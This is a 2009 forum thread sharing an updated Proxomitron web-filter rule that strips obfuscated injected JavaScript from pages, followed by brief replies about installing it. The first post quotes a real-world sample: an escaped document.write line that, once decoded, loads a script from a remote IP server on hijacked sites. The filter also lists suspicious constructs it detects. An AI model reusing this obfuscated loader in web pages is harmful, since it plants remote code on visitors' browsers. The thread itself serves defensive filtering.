Bugfix + 0day: JS Kill - Specific Escaped Code - sidki3003 - Apr. 01, 2009 09:25 PM
Two changes:
- Global variable "a" wasn't always reset, resulting in odd (but harmless) secondary effects.
- I came across two sites today containing code (pointing to a Latvian server) like:
Code:
document.write(unescape('%3Cscrz7RiKQpt%20srK7c%3D%2F%2F94%2E247cMV%2E6xE2Hsh%2E1z7R93N5z7R%2FfIejq3Nuery%2Ejz7RsK7%3E3N%3C%2FsfIecriz7Rpt3N%3E').replace(/K7|fIe|cMV|z7R|KQ|Hsh|6xE|3N|NK/g,""));
If the new subroutine matches, you'll get a Log-Rare entry like:
Code:
WEB JS_Escape replace http://my-hijacked-site.com/
Let me know of any false positives.
Code:
[Patterns]
Name = "JS Kill: Specific Escaped Code 9.04.01 [sd] (d.2)"
Active = TRUE
URL = "($TYPE(htm)|$TYPE(js)|$TYPE(vbs))(^$TST(keyword=*.(a_js|a_jsmeth).*))"
Limit = 7800
Match = "\= \" (%3C$TST(script=[1s]*)((%73%63|%53%43)\4|)("
"*\"$SET(1==\"\")$SET(5= (string))|$SET(1==\"\"; var prxBlocked=\")$SET(5= (string, large))*"
")&&(^*</script)\6)"
"|\= \' (%3C$TST(script=[1s]*)((%73%63|%53%43)\4|)("
"*\'$SET(1==\'\')$SET(5= (string))|$SET(1==\'\'; var prxBlocked=\')$SET(5= (string, large))*"
")&&(^*</script)\6)"
"|unescape \($TST(script=[1s]*) ("
"$INEST(\(,(")\2(^%") (%3C(%73%63|%53%43)\4*|\6),\))\)"
"((^ [,;)])(.(replace)\4$SET(1=\2\2.replace)|)|$SET(1=\2\2))"
"|\\(")\2 (%3C(%73%63|%53%43)\4*|\6)\\$TST(\2) \)((^ [,;)])|$SET(1=\\\2\\\2))$SET(5= (2nd level))"
"|(\\+")\2(^%")$SET(1=PrxVoidF\(\2Blocked: $GET(a)\2, \2\4\6)$SET(5= (large))"
" (^*</script)(%3C(%73%63|%53%43)\4\6|\6)"
")"
"&"
"$TST(\4=replace$SET(a=\4)|$SET(a=script)*)"
"|$TST($UESC(\6)=*("
".(createControlRange|FileSystemObject|fromCharCode)\4$SET(a=\4)"
"|<(iframe$SET(a=iframe)|applet$SET(a=applet)|object[^>]++data=$SET(a=object data))"
"|c("
"reateObject$SET(a=CreateObject)"
"|l(sid( \(" {| : {+|=" {+)|assid=" {+)(^D27CDB6E-AE6D-11cf-96B8-444553540000|[^0-9a-f])"
"$LST(ClassIDs)$SET(a=ClsID: \9)"
")"
"|ms-its:$SET(a=ms-its)"
"|src=$TST(flag=*.adurl:1.*)(\\(")\3 ((^\\$TST(\3))*\\$TST(\3)&&$LST(AdList)$SET(a=src: \9)*)|"
"$AV( ?*& $LST(AdList)$SET(a=src: \9)))"
"|unescape(^(^ \())$SET(a=unescape)"
"|VBScript$SET(a=VBScript)"
")*)"
"&"
"($TYPE(htm)$SET(eHits=$GET(eHits)"
"%3Cspan class=%22ProxFly-Span%22>$GET(mHead) JS Escape:%3C/span>"
" $ESC($GET(a))\5%3Cbr class=%22ProxFly-Br%22 />"
")|)"
"($TST(volat=*.log:2*)$ADDLST(Log-Main,[$DTM(d T)]\tWEB JS_Escape\5 \t$GET(a) \t\u)|)"
"($TST(volat=*.log:[12]c.*)$ADDLST(Log-Rare,WEB JS_Escape\5 \t$GET(a) \t\u)|)"
Replace = "\1$SET(a=)"
RE: Bugfix + 0day: JS Kill - Specific Escaped Code - bugger - Apr. 02, 2009 01:15 AM
where do i put the filter?
under JS intercept?
RE: Bugfix + 0day: JS Kill - Specific Escaped Code - sidki3003 - Apr. 02, 2009 01:34 AM
Dang, as mentioned above, it's an update.
So, look for the previous version, untick it, place the new version above it, save the config.
RE: Bugfix + 0day: JS Kill - Specific Escaped Code - bugger - Apr. 02, 2009 02:31 AM
oh bugger. My apology!
|